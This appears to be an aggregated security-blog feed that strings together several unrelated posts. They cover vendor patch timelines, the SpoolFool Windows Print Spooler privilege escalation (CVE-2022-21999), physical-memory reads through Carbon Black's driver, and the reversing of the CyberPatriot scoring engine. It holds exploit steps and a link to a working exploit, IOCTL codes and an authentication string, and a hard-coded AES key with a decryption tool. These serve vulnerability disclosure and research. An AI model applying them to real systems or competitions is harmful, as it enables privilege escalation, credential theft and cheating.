For Google, and in particular Chrome, we suspect that the quick turnaround time on security bugs is in part due to their rapid release cycle, as well as their additional stable releases for security updates. We're encouraged by Chrome's recent switch from a 6-week release cycle to a 4-week release cycle. On the Android side, we see the Pixel variant of Android releasing fixes about on par with the Samsung variants as well as iOS. Even so, we encourage the Android team to look for additional ways to speed up the application of security updates and push that segment of the industry further.

For Apple, we're pleased with the acceleration of patches landing, as well as the recent lack of use of grace periods as well as lack of missed deadlines. For WebKit in particular, we hope to see a reduction in the amount of time it takes between landing a patch and shipping it out to users, especially since WebKit security affects all browsers used in iOS, as WebKit is the only browser engine permitted on the iOS platform.

For Microsoft, we suspect that the high time to fix and Microsoft's reliance on the grace period are consequences of the monthly cadence of Microsoft's "patch Tuesday" updates, which can make it more difficult for development teams to meet a disclosure deadline. We hope that Microsoft might consider implementing a more frequent patch cadence for security issues, or finding ways to further streamline their internal processes to land and ship code quicker.

Moving forward

This post represents some number-crunching we've done of our own public data, and we hope to continue this going forward. Now that we've established a baseline over the past few years, we plan to continue to publish an annual update to better understand how the trends progress.

To that end, we'd love to have even more insight into the processes and timelines of our vendors. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities. Through more transparency, information sharing, and collaboration across the industry, we believe we can learn from each other's best practices, better understand existing difficulties and hopefully make the internet a safer place for all.

First!

8 February 2022 at 17:38

Today we are launching the IFCR research blog. The ambition is to provide original research and new technical ideas and approaches to the offensive security community.

New material will be added occasionally and not by a defined schedule. That being said, we’ve already got quite a few interesting posts lined-up.

Stay tuned for more…!

The IFCR Offensive Ops Team


First! was originally published in IFCR on Medium, where people are continuing the conversation by highlighting and responding to this story.

SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-21999)

8 February 2022 at 20:21

UPDATE (Feb 9, 2022): Microsoft initially patched this vulnerability without giving me any information or acknowledgement, and as such, at the time of patch release, I thought that the vulnerability was identified as CVE-2022–22718, since it was the only Print Spooler vulnerability in the release without any acknowledgement. I contacted Microsoft for clarification, and the day after the patch release, Institut For Cyber Risk and I was acknowledged for CVE-2022–21999.

In this blog post, we’ll look at a Windows Print Spooler local privilege escalation vulnerability that I found and reported in November 2021. The vulnerability got patched as part of Microsoft’s Patch Tuesday in February 2022. We’ll take a quick tour of the components and inner workings of the Print Spooler, and then we’ll dive into the vulnerability with root cause, code snippets, images and much more. At the end of the blog post, you can also find a link to a functional exploit.

Background

Back in May 2020, Microsoft patched a Windows Print Spooler privilege escalation vulnerability. The vulnerability was assigned CVE-2020–1048, and Microsoft acknowledged Peleg Hadar and Tomer Bar of SafeBreach Labs for reporting the security issue. On the same day of the patch release, Yarden Shafir and Alex Ionescu published a technical write-up of the vulnerability. In essence, a user could write to an arbitrary file by creating a printer port that pointed to a file on disk. After the vulnerability (CVE-2020–1048) had been patched, the Print Spooler would now check if the user had permissions to create or write to the file before adding the port. A week after the release of the patch and blog post, Paolo Stagno (aka VoidSec) privately disclosed a bypass for CVE-2020–1048 to Microsoft. The bypass was patched three months later in August 2020, and Microsoft acknowledged eight independent entities for reporting the vulnerability, which was identified as CVE-2020–1337. The bypass for the vulnerability used a directory junction (symbolic link) to circumvent the security check. Suppose a user created the directory C:\MyFolder\ and configured a printer port to point to the file C:\MyFolder\Port. This operation would be granted, since the user is indeed allowed to create C:\MyFolder\Port. Now, what would happen if the user then turned C:\MyFolder\ into a directory junction that pointed to C:\Windows\System32\ after the port had been created? Well, the Spooler would simply write to the file C:\Windows\System32\Port.

These two vulnerabilities, CVE-2020–1048 and CVE-2020–1337, were patched in May and August 2020, respectively. In September 2020, Microsoft patched a different vulnerability in the Print Spooler. In short, this vulnerability allowed users to create arbitrary and writable directories by configuring the SpoolDirectory attribute on a printer. What was the patch? Almost the same story: After the patch, the Print Spooler would now check if the user had permissions to create the directory before setting the SpoolDirectory property on a printer. Perhaps you can already see where this post is going. Let’s start at the beginning.

Introduction to Spooler Components

The Windows Print Spooler is a built-in component on all Windows workstations and servers, and it is the primary component of the printing interface. The Print Spooler is an executable file that manages the printing process. Management of printing involves retrieving the location of the correct printer driver, loading that driver, spooling high-level function calls into a print job, scheduling the print job for printing, and so on. The Spooler is loaded at system startup and continues to run until the operating system is shut down. The primary components of the Print Spooler are illustrated in the following diagram.

https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-spooler-components

Application

The print application creates a print job by calling Graphics Device Interface (GDI) functions or directly into winspool.drv.

GDI

The Graphics Device Interface (GDI) includes both user-mode and kernel-mode components for graphics support.

winspool.drv

winspool.drv is the client interface into the Spooler. It exports the functions that make up the Spooler’s Win32 API, and provides RPC stubs for accessing the server.

spoolsv.exe

spoolsv.exe is the Spooler’s API server. It is implemented as a service that is started when the operating system is started. This module exports an RPC interface to the server side of the Spooler’s Win32 API. Clients of spoolsv.exe include winspool.drv (locally) and win32spl.dll (remotely). The module implements some API functions, but most function calls are passed to a print provider by means of the router (spoolss.dll).

Router

The router, spoolss.dll, determines which print provider to call, based on a printer name or handle supplied with each function call, and passes the function call to the correct provider.

Print Provider

The print provider that supports the specified print device.

Local Print Provider

The local print provider provides job control and printer management capabilities for all printers that are accessed through the local print provider’s port monitors.

The following diagram provides a view of control flow among the local printer provider’s components, when an application creates a print job.

https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-print-providers

While this control flow is rather large, we will mostly focus on the local print provider localspl.dll.

Vulnerability

The vulnerability consists of two bypasses for CVE-2020–1030. I highly recommend reading Victor Mata’s blog post on CVE-2020–1030, but I’ll try to cover the important parts as well.

When a user prints a document, a print job is spooled to a predefined location referred to as the “spool directory”. The spool directory is configurable on each printer and it must allow the FILE_ADD_FILE permission to all users.

Permissions of the default spool directory

Individual spool directories are supported by defining the SpoolDirectory value in a printer’s registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\<printer>.

The Print Spooler provides APIs for managing configuration data such as EnumPrinterData, GetPrinterData, SetPrinterData, and DeletePrinterData. Underneath, these functions perform registry operations relative to the printer’s key.

We can modify a printer’s configuration with SetPrinterDataEx. This function requires a printer to be opened with the PRINTER_ACCESS_ADMINISTER access right. If the current user doesn’t have permission to open an existing printer with the PRINTER_ACCESS_ADMINISTER access right, there are two options:

  • The user can create a new local printer
  • The user can add a remote printer

By default, users in the INTERACTIVE group have the “Manage Server” permission and can therefore create new local printers, as shown below.

Security of the local print server on Windows desktops

However, it seems that this permission is only granted on Windows desktops, such as Windows 10 and Windows 11. During my testing on Windows servers, this permission was not present. Nonetheless, it was still possible for users without the “Manage Server” permission to add remote printers.

If a user adds a remote printer, the printer will inherit the security properties of the shared printer from the printer server. As such, if the remote printer server allows Everyone to manage the printer, then it’s possible to obtain a handle to the printer with the PRINTER_ACCESS_ADMINISTER access right, and SetPrinterDataEx would update the local registry as usual. A user could therefore create a shared printer on a different server or workstation, and grant Everyone the right to manage the printer. On the victim server, the user could then add the remote printer, which would now be manageable by Everyone. While I haven’t fully tested how this vulnerability behaves on remote printers, it could be a viable option for situations, where the user cannot create or mange a local printer. But please note that while some operations are handled by the local print provider, others are handled by the remote print provider.

When we have opened or created a printer with the PRINTER_ACCESS_ADMINISTER access right, we can configure the SpoolDirectory on it.

When calling SetPrinterDataEx, an RPC request will be sent to the local Print Spooler spoolsv.exe, which will route the request to the local print provider’s implementation in localspl.dll!SplSetPrinterDataEx. The control flow consists of the following events:

  • 1. spoolsv.exe!SetPrinterDataEx routes to SplSetPrinterDataEx in the local print provider localspl.dll
  • 2. localspl.dll!SplSetPrinterDataEx validates permissions before restoring SYSTEM context and modifying the registry via localspl.dll!SplRegSetValue

In the case of setting the SpoolDirectory value, localspl.dll!SplSetPrinterDataEx will verify that the provided directory is valid before updating the registry key. This check was not present before CVE-2020–1030.

localspl.dll!SplSetPrinterDataEx

Given a path to a directory, localspl.dll!IsValidSpoolDirectory will call localspl.dll!AdjustFileName to convert the path into a canonical path. For instance, the canonical path for C:\spooldir\ would be \\?\C:\spooldir\, and if C:\spooldir\ is a symbolic link to C:\Windows\System32\, the canonical path would be \\?\C:\Windows\System32\. Then, localspl.dll!IsValidSpoolDirectory will check if the current user is allowed to open or create the directory with GENERIC_WRITE access right. If the directory was successfully created or opened, the function will make a final check that the number of links to the directory is not greater than 1, as returned by GetFileInformationByHandle.

localspl.dll!IsValidSpoolDirectory

So in order to set the SpoolDirectory, the user must be able to create or open the directory with writable permissions. If the validation succeeds, the print provider will update the printer’s SpoolDirectory registry key. However, the spool directory will not be created by the Print Spooler until it has been reinitialized. This means that we will need to figure out how to restart the Spooler service (we will come back to this part), but it also means that the user only needs to be able to create the directory during the validation when setting the SpoolDirectory registry key — and not when the directory is actually created.

In order to bypass the validation, we can use reparse points (directory junctions in this case). Suppose we create a directory named C:\spooldir\, and we set the SpoolDirectory to C:\spooldir\printers\. The Spooler will check that the user can create the directory printers inside of C:\spooldir\. The validation passes, and the SpoolDirectory gets set to C:\spooldir\printers\. After we have configured the SpoolDirectory, we can convert C:\spooldir\ into a reparse point that points to C:\Windows\System32\. When the Spooler initializes, the directory C:\Windows\System32\printers\ will be created with writable permissions for everyone. If the directory already exists, the Spooler will not set writable permissions on the folder.

As such, we need to find an interesting place to create a directory. One such place is C:\Windows\System32\spool\drivers\x64\, also known as the printer driver directory (on other architectures, it’s not x64). The printer driver directory is particularly interesting, because if we call SetPrinterDataEx with the CopyFiles registry key, the Spooler will automatically load the DLL assigned in the Module value — if the Module file path is allowed.

This event is triggered when pszKeyName begins with the CopyFiles\ string. It initiates a sequence of functions leading to LoadLibrary.

localspl.dll!SplSetPrinterDataEx

The control flow consists of the following events:

  • 1. spoolsv.exe!SetPrinterDataEx routes to SplSetPrinterDataEx in the local print provider localspl.dll
  • 2. localspl.dll!SplSetPrinterDataEx validates permissions before restoring SYSTEM context and modifying the registry via localspl.dll!SplRegSetValue
  • 3. localspl.dll!SplCopyFileEvent is called if pszKeyName argument begins with CopyFiles\ string
  • 4. localspl.dll!SplCopyFileEvent reads the Module value from printer’s CopyFiles registry key and passes the string to localspl.dll!SplLoadLibraryTheCopyFileModule
  • 5. localspl.dll!SplLoadLibraryTheCopyFileModule performs validation on the Module file path
  • 6. If validation passes, localspl.dll!SplLoadLibraryTheCopyFileModule attempts to load the module with LoadLibrary

The validation steps consist of localspl.dll!MakeCanonicalPath and localspl.dll!IsModuleFilePathAllowed. The function localspl.dll!MakeCanonicalPath will take a path and convert it into a canonical path, as described earlier.

localspl.dll!MakeCanonicalPath

localspl.dll!IsModuleFilePathAllowed will validate that the canonical path either resides directly inside of C:\Windows\System32\ or within the printer driver directory. For instance, C:\Windows\System32\payload.dll would be allowed, whereas C:\Windows\System32\Tasks\payload.dll would not. Any path inside of the printer driver directory is allowed, e.g. C:\Windows\System32\spool\drivers\x64\my\path\to\payload.dll is allowed. If we are able to create a DLL in C:\Windows\System32\ or anywhere in the printer driver directory, we can load the DLL into the Spooler service.

localspl.dll!SplLoadLibraryTheCopyFileModule

Now, we know that we can use the SpoolDirectory to create an arbitrary directory with writable permissions for all users, and that we can load any DLL into the Spooler service that resides in either C:\Windows\System32\ or the printer driver directory. There is only one issue though. As mentioned earlier, the spool directory is created during the Spooler initialization. The spool directory is created when localspl.dll!SplCreateSpooler calls localspl.dll!BuildPrinterInfo. Before localspl.dll!BuildPrinterInfo allows Everybody the FILE_ADD_FILE permission, a final check is made to make sure that the directory path does not reside within the printer driver directory.

localspl.dll!BuildPrinterInfo

This means that a security check during the Spooler initialization verifies that the SpoolDirectory value does not point inside of the printer driver directory. If it does, the Spooler will not create the spool directory and simply fallback to the default spool directory. This security check was also implemented in the patch for CVE-2020-1030.

To summarize, in order to load the DLL with localspl.dll!SplLoadLibraryTheCopyFileModule, the DLL must reside inside of the printer driver directory or directly inside of C:\Windows\System32\. To create the writable directory during Spooler initialization, the directory must not reside inside of the printer driver directory. Both localspl.dll!SplLoadLibraryTheCopyFileModule and localspl.dll!BuildPrinterInfo check if the path points inside the printer driver directory. In the first case, we must make sure that the DLL path begins with C:\Windows\System32\spool\drivers\x64\, and in the second case, we must make sure that the directory path does not begin with C:\Windows\System32\spool\drivers\x64\.

During the both checks, the SpoolDirectory is converted to a canonical path, so even if we set the SpoolDirectory to C:\spooldir\printers\ and then convert C:\spooldir\ into a reparse point that points to C:\Windows\System32\spool\drivers\x64\, the canonical path will still become \\?\C:\Windows\System32\spool\drivers\x64\printers\. The check is done by stripping of the first four bytes of the canonical path, i.e. \\?\C:\Windows\System32\spool\drivers\x64\ printers\ becomes C:\Windows\System32\spool\drivers\x64\ printers\, and then checking if the path begins with the printer driver directory C:\Windows\System32\spool\drivers\x64\. And so, here comes the second bug to pass both checks.

If we set the spooler directory to a UNC path, such as \\localhost\C$\spooldir\printers\ (and C:\spooldir\ is a reparse point to C:\Windows\System32\spool\drivers\x64\), the canonical path will become \\?\UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\, and during comparison, the first four bytes are stripped, so UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\ is compared to C:\Windows\System32\spool\drivers\x64\ and will no longer match. When the Spooler initializes, the directory \\?\UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\ will be created with writable permissions. We can now write our DLL into C:\Windows\System32\spool\drivers\x64\printers\payload.dll. We can then trigger the localspl.dll!SplLoadLibraryTheCopyFileModule, but this time, we can just specify the path normally as C:\Windows\System32\spool\drivers\x64\printers\payload.dll.

We now have the primitives to create a writable directory inside of the printer driver directory and to load a DLL within the driver directory into the Spooler service. The only thing left is to restart the Spooler service such that the directory will be created. We could wait for the server to be restarted, but there is a technique to terminate the service and rely on the recovery to restart it. By default, the Spooler service will restart on the first two “crashes”, but not on subsequent failures.

To terminate the service, we can use localspl.dll!SplLoadLibraryTheCopyFileModule to load C:\Windows\System32\AppVTerminator.dll. When loaded into Spooler, the library calls TerminateProcess which subsequently kills the spoolsv.exe process. This event triggers the recovery mechanism in the Service Control Manager which in turn starts a new Spooler process. This technique was explained for CVE-2020-1030 by Victor Mata from Accenture.

Here’s a full exploit in action. The DLL used in this example will create a new local administrator named “admin”. The DLL can also be found in the exploit repository.

SpoolFool in action

The steps for the exploit are the following:

  • Create a temporary base directory that will be used for our spool directory, which we’ll later turn into a reparse point
  • Create a new local printer named “Microsoft XPS Document Writer v4”
  • Set the spool directory of our new printer to be our temporary base directory
  • Create a reparse point on our temporary base directory to point to the printer driver directory
  • Force the Spooler to restart to create the directory by loading AppVTerminator.dll into the Spooler
  • Write DLL into the new directory inside of the printer driver directory
  • Load the DLL into the Spooler

Remember that it is sufficient to create the driver directory only once in order to load as many DLLs as desired. There’s no need to trigger the exploit multiple times, doing so will most likely end up killing the Spooler service indefinitely until a reboot brings it back up. When the driver directory has been created, it is possible to keep writing and loading DLLs from the directory without restarting the Spooler service. The exploit that can be found at the end of this post will check if the driver directory already exists, and if so, the exploit will skip the creation of the directory and jump straight to writing and loading the DLL. The second run of the exploit can be seen below.

Second run of SpoolFool

The functional exploit and DLL can be found here: https://github.com/ly4k/SpoolFool.

Conclusion

That’s it. Microsoft has officially released a patch. When I initially found out that there was a check during the actual creation of the directory as well, I started looking into other interesting places to create a directory. I found this post by Jonas L from Secret Club, where the Windows Error Reporting Service (WER) is abused to exploit an arbitrary directory creation primitive. However, the technique didn’t seem to work reliably on my Windows 10 machine. The SplLoadLibraryTheCopyFileModule is very reliable however, but assumes that the user can manage a printer, which is already the case for this vulnerability.

Patch Analysis

[Feb 08, 2022]

A quick check with Process Monitor reveals that the SpoolDirectory is no longer created when the Spooler initializes. If the directory does not exist, the Print Spooler falls back to the default spool directory.

To be continued…

Disclosure Timeline

  • Nov 12, 2021: Reported to Microsoft Security Response Center (MSRC)
  • Nov 15, 2021: Case opened and assigned
  • Nov 19, 2021: Review and reproduction
  • Nov 22, 2021: Microsoft starts developing a patch for the vulnerability
  • Jan 21, 2022: The patch is ready for release
  • Feb 08, 2022: Patch is silently released. No acknowledgement or information received from Microsoft
  • Feb 09, 2022: Microsoft gives acknowledgement to me and Institut For Cyber Risk for CVE-2022-21999

SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-21999) was originally published in IFCR on Medium, where people are continuing the conversation by highlighting and responding to this story.

Reading Physical Memory using Carbon Black's Endpoint driver

14 February 2019 at 15:22
Reading Physical Memory using Carbon Black's Endpoint driver

Enterprises rely on endpoint security software in order to secure machines that have access to the enterprise network. Usually considered the next step in the evolution of anti-virus solutions, endpoint protection software can protect against various attacks such as an employee running a Microsoft Word document with macros and other conventional attacks against enterprises. In this article, I'll be looking at Carbon Black's endpoint protection software and the vulnerabilities attackers can take advantage of. Everything I am going to review in this article has been reported to Carbon Black and they have said it is not a real security issue because it requires Administrator privileges.

Driver Authentication

The Carbon Black driver (cbk7.sys) has a basic authentication requirement before accepting IOCTLs. After opening the "\\.\CarbonBlack" pipe, you must send "good job you can use IDA, you get a cookie\x0\x0\x0\x0\x0\x0\x0\x0" with the IOCTL code of 0x81234024.

Setting Acquisition Mode

The acquisition mode is a value the driver uses to determine what method to take when reading physical memory, we'll get into this in the next section. To set the acqusition mode, an attacker must send the new acquisition value in the input buffer for the IOCTL 0x8123C144 as an uint32_t.

Physical Memory Read Accesss

The Carbon Black Endpoint Sensor driver has an IOCTL (0x8123C148) that allows you to read an arbitrary physical memory address. It gives an attackers three methods/options of reading physical memory:

  1. If Acquisition Mode is set to 0, the driver uses MmMapIoSpace to map the physical memory then copies the data.
  2. If Acquisition Mode is set to 1, the driver opens the "\Device\PhysicalMemory" section and copies the data.
  3. If Acquisition Mode is set to 2, the driver translates the physical address to a virtual address and copies that.

To read physical memory, you must send the following buffer:

struct PhysicalMemReadRequest {
  uint64_t ptrtoread; // The physical memory address you'd like to read.
  uint64_t bytestoread; // The number of bytes to read.
};

The output buffer size should be bytestoread.

CR3 Access

Carbon Black was nice enough to have another IOCTL (0x8123C140) that gives a list of known physical memory ranges (calls MmGetPhysicalMemoryRanges) and provides the CR3 register (Directory Base). This is great news for an attacker because it means they don't have to predict/bruteforce a directory base and instead can convert a physical memory address directly to a kernel virtual address with ease (vice-versa too!).

To call this IOCTL, you need to provide an empty input buffer and output buffer with a minimum size of 0x938 bytes. To get the CR3, simply do *(uint64t_t*)(outputbuffer).

Impact

You might ask what's the big deal if you need administrator for this exploit. The issue I have is that the Carbon Black endpoint software will probably not be on an average home PC, rather on corporate endpoints. If a company is willing to purchase a software such as Carbon Black to protect their endpoints, they're probably doing other secure measures too. This might include having a whitelisted driver system, secure boot, LSA Protection, etc. If an attacker gains administrator on the endpoint (i.e if parent process was elevated), then they could not only disable the protection of Carbon Black, but could use their driver to read sensitive information (like the memory of lsass.exe if LSA Protection is on). My point is, this vulnerability allows an attacker to use a whitelisted driver to access any memory on the system most likely undetected by any anti-virus on the system. I don't know about you, but to me this is not something I'd accept from the software that's supposed to protect me.

The hash of the cbk7.sys driver is ec5b804c2445e84507a737654fd9aae8 (MD5) and 2afe12bfcd9a5ef77091604662bbbb8d7739b9259f93e94e1743529ca04ae1c3 (SHA256).

Reversing the CyberPatriot National Competition Scoring Engine

12 April 2019 at 22:10

Edit 4/12/2019

Reversing the CyberPatriot National Competition Scoring Engine

Originally, I published this post a month ago. After my post, I received a kind email from one of the primary developers for CyberPatriot asking that I take my post down until they can change their encryption algorithm. Given that the national competition for CyberPatriot XI was in a month, I decided to take the post down until after national competitions completed. National competitions ended yesterday which is why I am re-publishing this write up now.

Disclaimer

This article pertains to the competitions prior to 2018, as I have stopped participating in newer competitions and therefore no longer subject to the competition’s rule book. This information is meant for educational use only and as fair use commentary for the competition in past years.

Preface

CyberPatriot is the air force association's "national youth cyber education program". The gist of the competition is that competitors (teams around the nation) are given virtual machines that are vulnerable usually due to configuration issues or malicious files. Competitors must find and patch these holes to gain points.

The points are calculated by the CyberPatriot Scoring Engine, a program which runs on the vulnerable virtual machine and does routine checks on different aspects of the system that are vulnerable to see if they were patched.

I am a high school senior who participated in the competition 2015-2016, 2016-2017, 2017-2018 for a total of 3 years. My team got to regionals consistently and once got under the 12th place cut-off for an hour. The furthest my team got was regionals (once even got under 12th place for a good hour, which is the cut off for nationals). I did not participate this year because unfortunately the organization which was hosting CyberPatriot teams, ours included, stopped due to the learning curve.

This all started when I was cleaning up my hard drive to clear up some space. I found an old folder called "CyberPatriot Competition Images" and decided to take a look. In the years I was competing in CyberPatriot, I had some reversing knowledge, but it was nothing to compared to what I can do today. I thought it would be a fun experiment to take a look at the most critical piece of the CyberPatriot infrastructure - the scoring engine. In this article, I'm going to be taking an in-depth look into the CyberPatriot scoring engine, specifically for the 2017-2018 (CyberPatriot X) year.

General Techniques

If all you wanted to do is see what the engine accesses, the easiest way would be to hook different Windows API functions such as CreateFileW or RegOpenKeyExA. The reason I wanted to go deeper is that you don't see what they're actually checking, which is the juicy data we want.

Reversing

When the Scoring Engine first starts, it initially registers service control handlers and does generic service status updates. The part we are interested in is when it first initializes.

Before the engine can start scanning for vulnerabilities, it needs to know what to check and where to send the results of the checks to. The interesting part of the Scoring Engine is that this information is stored offline. This means, everything the virtual machine you are using will check is stored on disk and does not require an internet connection. This somewhat surprised me because storing the upload URL and other general information on disk makes sense, but storing what's going to be scored?

After initializing service related classes, the engine instantiates a class that will contain the parsed information from the local scoring data. Local scoring data is stored (encrypted) in a file called "ScoringResource.dat". This file is typically stored in the "C:\CyberPatriot" folder in the virtual machine.

The Scoring Data needs to be decrypted and parsed into the information class. This happens in a function I call "InitializeScoringData". At first, the function can be quite overwhelming due to its size. It turns out, only the first part does the decryption of the Scoring Data, the rest is just parsing through the XML (the Scoring Data is stored in XML format). The beginning of the "InitializeScoringData" function finds the path to the "ScoringResource.dat" file by referencing the path of the current module ("CCSClient.exe", the scoring engine, is in the same folder as the Scoring Data). For encryption and decryption, the Scoring Engine uses the Crypto++ library (version 5.6.2) and uses AES-GCM. After finding the name of the "ScoringResource.dat" file, the engine initializes the CryptContext for decryption.

Reversing the CyberPatriot National Competition Scoring Engine

The function above initializes the cryptographic context that the engine will later use for decryption. I opted to go with a screenshot to show how the AES Key is displayed in IDA Pro. The AES Key Block starts at Context + 0x4 and is 16 bytes. Following endianness, the key ends up being 0xB, 0x50, 0x96, 0x92, 0xCA, 0xC8, 0xCA, 0xDE, 0xC8, 0xCE, 0xF6, 0x76, 0x95, 0xF5, 0x1E, 0x99 starting at the *(_DWORD*)(Context + 4) to the *(_DWORD*)(Context + 0x10).

After initializing the cryptographic context, the Decrypt function will check that the encrypted data file exists and enter a function I call "DecryptData". This function is not only used for decrypting the Scoring Data, but also Scoring Reports.

The "DecryptData" function starts off by reading in the Scoring Data from the "ScoringResource.dat" file using the boost library. It then instantiates a new "CryptoPP::StringSink" and sets the third argument to be the output string. StringSink's are a type of object CryptoPP uses to output to a string. For example, there is also a FileSink if you want to output to a file. The "DecryptData" function then passes on the CryptContext, FileBuffer, FileSize, and the StringSink to a function I call "DecryptBuffer".

The "DecryptBuffer" function first checks that the file is greater than 28 bytes, if it is not, it does not bother decrypting. The function then instantiates a "CryptoPP::BlockCipherFinal" for the AES Class and sets the key and IV. The interesting part is that the IV used for AES Decryption is the first 12 bytes of the file we are trying to decrypt. These bytes are not part of the encrypted content and should be disregarded when decrypting the buffer. If you remember, the key for the AES decryption was specified in the initialize CryptoPP function.

After setting the key and IV used for the AES decryption, the function instantiates a "CryptoPP::ZlibDecompressor". It turns out that the Scoring Data is deflated with Zlib before being encrypted, thus to get the Scoring Data, the data must be inflated again. This Decompressor is attached to the "StreamTransformationFilter" so that after decryption and before the data is put into the OutputString, the data is inflated.

The function starts decrypting by pumping the correct data into different CryptoPP filters. AES-GCM verifies the hash of the file as you decrypt, which is why you'll hear me referring to the "HashVerificationFilter". The "AuthenticatedDecryptionFilter" decrypts and the "StreamTransformationFilter" allows the data to be used in a pipeline.

First, the function inputs the last 16 bytes of the file into the "HashVerificationFilter" and also the IV. Then, it inputs the file contents after the 12th byte into the "AuthenticatedDecryptionFilter" which subsequently pipes it into the "StreamTransformationFilter" which inflates the data on-the-go. If the "HashVerificationFilter" does not throw an error, it returns that the decryption succeeded.

The output buffer now contains the XML Scoring Data. Here is the format it takes:

<?xml version="1.0" encoding="utf-8"?>
<CyberPatriotResource>
  <ResourceID></ResourceID>
  <Tier/>
  <Branding>CyberPatriot</Branding>
  <Title></Title>
  <TeamKey></TeamKey>
  <ScoringUrl></ScoringUrl>
  <ScoreboardUrl></ScoreboardUrl>
  <HideScoreboard>true</HideScoreboard>
  <ReadmeUrl/>
  <SupportUrl/>
  <TimeServers>
    <Primary></Primary>
    <Secondary>http://time.is/UTC</Secondary>
    <Secondary>http://nist.time.gov/</Secondary>
    <Secondary>http://www.zulutime.net/</Secondary>
    <Secondary>http://time1.ucla.edu/home.php</Secondary>
    <Secondary>http://viv.ebay.com/ws/eBayISAPI.dll?EbayTime</Secondary>
    <Secondary>http://worldtime.io/current/utc_netherlands/8554</Secondary>
    <Secondary>http://www.timeanddate.com/worldclock/timezone/utc</Secondary>
    <Secondary>http://www.thetimenow.com/utc/coordinated_universal_time</Secondary>
    <Secondary>http://www.worldtimeserver.com/current_time_in_UTC.aspx</Secondary>
  </TimeServers>
  <DestructImage>
    <Before></Before>
    <After></After>
    <Uptime/>
    <Playtime/>
    <InvalidClient></InvalidClient>
    <InvalidTeam/>
  </DestructImage>
  <DisableFeedback>
    <Before></Before>
    <After></After>
    <Uptime/>
    <Playtime/>
    <NoConnection></NoConnection>
    <InvalidClient></InvalidClient>
    <InvalidTeam></InvalidTeam>
  </DisableFeedback>
  <WarnAfter/>
  <StopImageAfter/>
  <StopTeamAfter/>
  <StartupTime>60</StartupTime>
  <IntervalTime>60</IntervalTime>
  <UploadTimeout>24</UploadTimeout>
  <OnPointsGained>
    <Execute>C:\CyberPatriot\sox.exe C:\CyberPatriot\gain.wav -d -q</Execute>
    <Execute>C:\CyberPatriot\CyberPatriotNotify.exe You Gained Points!</Execute>
  </OnPointsGained>
  <OnPointsLost>
    <Execute>C:\CyberPatriot\sox.exe C:\CyberPatriot\alarm.wav -d -q</Execute>
    <Execute>C:\CyberPatriot\CyberPatriotNotify.exe You Lost Points.</Execute>
  </OnPointsLost>
  <AutoDisplayPoints>true</AutoDisplayPoints>
  <InstallPath>C:\CyberPatriot</InstallPath>
  <TeamConfig>ScoringConfig</TeamConfig>
  <HtmlReport>ScoringReport</HtmlReport>
  <HtmlReportTemplate>ScoringReportTemplate</HtmlReportTemplate>
  <XmlReport>ScoringData/ScoringReport</XmlReport>
  <RedShirt>tempfile</RedShirt>
  <OnInstall>
    <Execute>cmd.exe /c echo Running installation commands</Execute>
  </OnInstall>
  <ValidClient> <--! Requirements for VM -->
    <ResourcePath>C:\CyberPatriot\ScoringResource.dat</ResourcePath>
    <ClientPath>C:\CyberPatriot\CCSClient.exe</ClientPath>
    <ClientHash></ClientHash>
    <ProductID></ProductID>
    <DiskID></DiskID>
    <InstallDate></InstallDate>
  </ValidClient>
  <Check>
    <CheckID></CheckID>
    <Description></Description>
    <Points></Points>
    <Test>
      <Name></Name>
      <Type></Type>
      <<!--TYPE DATA-->></<!--TYPE DATA-->> <!-- Data that is the specified type -->
    </Test>
    <PassIf>
      <<!--TEST NAME-->>
        <Condition></Condition>
        <Equals></Equals>
      </<!--TEST NAME-->>
    </PassIf>
  </Check>
  <Penalty>
    <CheckID></CheckID>
    <Description></Description>
    <Points></Points>
    <Test>
      <Name></Name>
      <Type></Type>
      <<!--TYPE DATA-->></<!--TYPE DATA-->> <!-- Data that is the specified type -->
    </Test>
    <PassIf>
      <<!--TEST NAME-->>
        <Condition></Condition>
        <Equals></Equals>
      </<!--TEST NAME-->>
    </PassIf>
  </Penalty>
  <AllFiles>
    <FilePath></FilePath>
    ...
  </AllFiles>
  <AllQueries>
    <Key></Key>
    ...
  </AllQueries>
</CyberPatriotResource>

The check XML elements tell you exactly what they check for. I don't have the Scoring Data for this year because I did not participate, but here are some XML Scoring Data files for past years:

2016-2017 CP-IX High School Round 2 Windows 8: Here

2016-2017 CP-IX High School Round 2 Windows 2008: Here

2016-2017 CP-IX HS State Platinum Ubuntu 14: Here

2017-2018 CP-X Windows 7 Training Image: Here

Tool to decrypt

This is probably what a lot of you are looking for, just drag and drop an encrypted "ScoringResource.dat" onto the program, and the decrypted version will be printed. If you don't want to compile your own version, there is a compiled binary in the Releases section.

Github Repo: Here

Continuing reversing

After the function decrypts the buffer of Scoring Data, the "InitializeScoringData" parses through it and fills the information class with the data from the XML. The "InitializeScoringData" is only called once at the beginning of the engine and is not called again.

From then on, until the service receives the STOP message, it constantly checks to see if a team patched a vulnerability. In the routine function, the engine checks if the scoring data was initialized/decrypted, and if it wasn't, decrypts again. This is when the second check is done to see whether or not the image should be destructed. The factors it checks includes checking the time, checking the DestructImage object of the XML Scoring Data, etc.

If the function decides to destruct the image, it is quite amusing what it does...

Reversing the CyberPatriot National Competition Scoring Engine

The first if statement checks whether or not to destruct the image, and if it should destruct, it starts:

  • Deleting registry keys and the sub keys under them such as "SOFTWARE\\Microsoft\\Windows NT", "SOFTWARE\\Microsoft\\Windows", ""SOFTWARE\\Microsoft", "SOFTWARE\\Policies", etc.
  • Deleting files in critical system directories such as "C:\\Windows", "C:\\Windows\\System32", etc.
  • Overwriting the first 200 bytes of your first physical drive with NULL bytes.
  • Terminating every process running on your system.

As you can see in the image, it strangely repeats these functions over and over again before exiting. I guess they're quite serious when they say don't try to run the client on your machine.

After checking whether or not to destroy a system, it checks to see if the system is shutting down. If it is not, then it enters a while loop which executes the checks from the Scoring Data XML. It does this in a function I call "ExecuteCheck".

